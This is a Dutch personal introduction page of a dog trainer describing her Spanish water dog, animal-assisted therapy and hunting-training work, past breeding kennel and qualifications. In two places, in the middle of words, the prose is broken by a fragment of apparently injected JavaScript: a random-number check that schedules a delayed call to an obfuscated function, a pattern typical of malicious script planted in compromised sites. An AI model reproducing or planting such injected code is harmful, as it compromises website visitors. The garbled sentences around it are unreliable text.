Voorstellen

Christel

Chazzy en Chica

Mijn naam is Christel Holtrop en ik woon in het Nationaal Park De Utrechtse Heuvelrug met mijn  Spaanse waterhond Chazzy. Je kunt zeggen dat mijn leven draait om honden.

Ik werk zowel met Chazzy als met honden van andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)} // ]]>anderen in de dierondersteunde therapie, Animal Assisted Therapy. Daarnaast geef ik jachttraining. Tot 2020 heb ik  gedurende 14 jaar waterwerk workshops gegeven.

Ook met mijn eigen honden houd ik mij actief met jachttraining bezig.

Van 2005 tot en met 2013 heb ik Spaanse waterhonden gefokt onder de kennelnaam De Mansió Verd, www.spaansewaterhonden.nl

In 2007 rondde ik mijn opleiding tot hondeninstructeur en honden- gedragstherapeut af bij Geert de Bolster in België. Jaarlijks volg ik verschillende lezingen, workshops en seminars in binnen- en buitenlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)} // ]]>and om op de hoogte te blijven van de meest recente ontwikkelingen op het gebied van het honden in het algemeen en het gedrag en trainen van honden in het bijzonder.

In mijn werk met honden werk ik beloningsgericht en daarnaast heb ik mij sinds 2003 toegelegd op het trainen met de clicker. Sleutelwoorden in mijn trainingen zijn spelgericht trainen en werken vanuit verbondenheid met je hond.

Ik ben aangesloten bij de APDT-BeNe, een kwaliteitslabel voor hondentrainers. Tevens ben ik instructeur en assessor bij the Gundog Club in het Verenigd Koninkrijk. Voor details over gevolgde opleidingen en jaarlijkse bijscholingen klik hier